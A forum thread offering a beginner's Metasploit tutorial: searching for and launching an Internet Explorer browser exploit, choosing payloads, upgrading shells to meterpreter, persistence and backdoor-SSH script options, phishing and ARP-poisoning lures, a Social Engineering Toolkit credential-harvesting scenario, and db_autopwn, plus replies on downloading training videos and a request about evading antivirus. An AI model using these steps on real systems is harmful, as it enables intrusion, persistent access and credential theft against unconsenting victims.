If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

My Metasploit tutorial thread

For those beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see inlcuded or corrections that may need to be made. Currently this post is a work in progress

Common msfconsole tasks;
first of course open a terminal and issue the command

Code:

root@bt:~#msfconsole

Then there are some basics like searching for exploits. A more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that are 2010 microsoft security advisories.

Code:

search ms10

Next, maybe we want to know more about a given exploit; This information looks similar to what is found on the advisories and maybe even on Exploits Database by Offensive Security, but includes things like the options that can be set.

Code:

info windows/browser/ms10_xxx_ie_css_clip

now we will load up an exploit we'd like to try.

Code:

use windows/browser/ms10_xxx_ie_css_clip

We need to configure our exploit options for it to work of course. I like to select payloads first. Not all payloads work with all exploits. Too keep things simple the metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below(show payloads) the framwork will only show the payloads that work for your selected exploit.

Code:

msf exploit(ms10_xxx_ie_css_clip) > show payloads

Remember the info command we used with exploits? Well it works with payloads too. Take some time to familiarize yourself with the payloads metasploit has to offer.

The uripath options sets the directory the malicious webserver will be located. Root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options such as the excellent Metasploit Unleashed Information Security Training
Here is where you might want to include some automation or set some of the other features. To view advanced options available, issue the following command;

Code:

show advanced

A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
Please refer to the section 10 (meterpreter scripting) of the MSF unleashed course for more information on which scripts are available.
Another way is to issue the follow command in your terminal(not in the framework console)

The two autorunscript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, or beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
Now we need to run our exploit. I like the -j option as it backgrounds the exploit process so you can continue to work in the framework console.

Code:

exploit -j

Now find a creative way to lure your victim to your malicious website in this case since the exploit we've selected here is a client side. You could use ARP poisoning or a phishing style attack with the link. Be inventive! I am just using a simple not updated windows XP SP3 machine running on my LAN in Virtualbox, so I will just browse there myself. In my victim's web-browser I simply entered my attackers IP

In this case we are using a simple reverse shell and not a meterpreter. The migration error is ok, as migrate is a meterpreter script. Some instances maybe you could only begin with a shell due to payload limitations an exploit has. No problem. Here is what I like to do

Turning windows shells into meterpreter sessions the easy way.
First, lets list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.

that -u options is pretty sweet. Lets go ahead and upgrade our shell to a meterpreter. FYI, It did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway the update a shell command is;

Code:

msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1

EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgraded that. I've also shown the makerc command, and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
Makerc is useful as it will generate a metasploit resource file(akin to a bash script for metasploit almost) of all the commands used in that session. Good automation tool. I will show using resource files later on, and they are also covered in the MSF unleashed coursem10_061_spoolss demo
...continued....

Re: My Metasploit tutorial thread

Now that we've "upgraded" lets discuss those meterpreter automations scripts briefly again.
To find out what syntax or features and options a script has you can use the run command, the script name, then the -h options. Here are some examples of a couple of the scripts I find useful

Code:

meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run win32-sshserver -h
OpenSSH-server deploy+run script
This script will deploy OpenSSH + run the SSH-server as a service
OPTIONS:
-F Force overwriting of registry-values
-I <opt> Install OpenSSH to the given directory
-N <opt> Set custom service name
-S <opt> Set custom service description
-U <opt> Download OpenSSH-SFX from given URL
-f <opt> The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com
-h This help menu
-m <opt> Do not start the OpenSSH-service after installation
-p <opt> Password for the new user
-r Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)
-t <opt> Set start-type of the service to manual (Default: auto)
-u <opt> Add windows-user (autoadded to local administrators

One handy feature is to set environment variables globally. This can be done with setg. Here is an example of setting meterpreter as the payload globally.

msf exploit(ms10_xxx_ie_css_clip) > unsetg
Usage: unset var1 var2 var3 ...
The unset command is used to unset one or more variables.
To flush all entires, specify 'all' as the variable name
msf exploit(ms10_xxx_ie_css_clip) > unsetg all
Flushing datastore...
msf exploit(ms10_xxx_ie_css_clip) >

A very cool way I've found for using setg for the global variables is with the Social Engineering Toolkit.
Say you want to be quick and dirty as you have other tasks for this pentest. You've already compromised your client's wireless network using your ninja skills, so you set up a fake facebook with SET, using a java attack, and ARP poison some of the interesting workstations on said wireless network with dns spoof, and get a meterpreter session. Now as we said, you also have a lot of other work to do on this particular pentest. Well you can

And get sessions, that you can make sure you will keep, and even grab credentials for all kinds of things, while you're working on your reporting or doing some further research. The global variables I have tried with the social engineering toolkit have allowed me to further tweak it's capabilities and automation. Thanks rel1k for such great tools!

I will continue to add things to this thread as I go on.

I will update this thread a little later on with my favorite resource links for Metasploit education.
Hope this thread is useful to some of you, even though there is a lot of redundant metasploit info out there.

And one last thing.... The metasploit developers recommend updating your metasploit at least every couple of days. New exploits are released, quite often existing code is improved, or better yet we are seeing new meterpreter scripts all the time.

This can be done using

Code:

msfupdate

Hope everyone enjoys my post, please leave comments, and lets all take a moment to thank the giants on whose shoulders we stand (backtrack developers, MSF developers, and other community contributors)!

Re: My Metasploit tutorial thread

Re: My Metasploit tutorial thread

The Metasploit class I've referenced on irongeek I actually just found and began watching myself when writing this tut. So far my fav part is Adrian asking, "Ok, so how many people are using metasploit in linux....?" [raising of hands] "And how many people are using msf in windows?" "ok, Just you..."

Seriously though, the framework is generally much smoother in linux, but sometimes it really is handy to have it in windows.

From the first video there, one new thing Adrian and Dave brought to my attention was the "sessions -l -v". The -v switch shows what exploit was performed to get said session. Here is a scenario that demonstrates how useful that is. We're running a db_autopwn against a victim. We get a number of sessions but want to know what exploits were successful

Bear in mind the IPs used in the above scenario a different from the beginning of the post. Just an isolated subnet for my virtual machines.

Some more commands I don't frequently see used in some of the other resources around.

First the makerc command is handy for making a resource file from the session you've just run. I'll get some information on using resource files in here also, but there is some information found in the MSFunleashed course.

Re: My Metasploit tutorial thread

THANK YOU AGAIN AND I WANT ADD THIS TUT :
Download videos from securitytube.net
Method 1 :
———
Viewing the source of the page in which the video is being played, and searching for “.mp4″ gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use firefox, and i used the download manager which came with the addon named “DownThemAll!” for this purpose.

Method 2 :
———
In case you are using linux, then the videos get buffered into the /tmp directory. Mostly, they`ll begin with the name “Flash” to be followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

Re: My Metasploit tutorial thread

Originally Posted by skull2006

THANK YOU AGAIN AND I WANT ADD THIS TUT :
Download videos from securitytube.net
Method 1 :
———
Viewing the source of the page in which the video is being played, and searching for “.mp4″ gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use firefox, and i used the download manager which came with the addon named “DownThemAll!” for this purpose.

Method 2 :
———
In case you are using linux, then the videos get buffered into the /tmp directory. Mostly, they`ll begin with the name “Flash” to be followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

Hope this helps!!! ;-)

Appreciate the tip! There are a lot of videos references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his xbox media center so he can use his epic size projector.

I like to use Ant Video Downloader with embedded FLV Player
which is a firefox plugin, with a player included so you don't need to go searching for where the heck it put those flv files(because where is does is somewhat of a long path sometimes).

Re: My Metasploit tutorial thread

Originally Posted by iproute

Appreciate the tip! There are a lot of videos references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his xbox media center so he can use his epic size projector.

I like to use Ant Video Downloader with embedded FLV Player
which is a firefox plugin, with a player included so you don't need to go searching for where the heck it put those flv files(because where is does is somewhat of a long path sometimes).

thank you for that too..........
And what about other SBH if the victim have AV,firewall,Patched.
May you can give us an Idea for that?

Re: My Metasploit tutorial thread

And what about other SBH if the victim have AV,firewall,Patched.
May you can give us an Idea for that?

I'll give some info on my take on it in another post when I've got more time, but I'm definitey not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.

Re: My Metasploit tutorial thread

I've decided to add a section on using db_autopwn, just too add to completeness and content. Please spend some time with the resources I've included in the links section as well. db_autopwn is a very handy tool to get some work done quickly, however using exploits individually can often be more effective as well as quieter/stealthier. Also, please configure you're postgresql database, as many of us have pointed out quite a number of times that sqlite3 has issues or is not as reliable as postgres for using db_autopwn. Visit sickn3ss' thread listed in the links section for information on configuring postgresql for this use.
Below is setting the driver, and confirming it is set to what you need

This is what will be output if you have not yet used postgres for this(i.e. have not created the database. In this case we are creating the database 'db_autopwn')
Anyway, here is the command to connect

Next, I like to verify the status of the connection. If you are not creating a new database and are connecting to an existing one, it may be a good idea to see if you've left anything in it. Here's the example

In the example above, there is nothing in the database. Entries can be added or otherwise manipulated manually with commands such as "db_add_host, db_add_port, db_del_host,etc." Of course nmap is a much simpler way of populating your database. Right now we are just going to add an individual host in with db_nmap, but you can certainly scan in a subnet instead.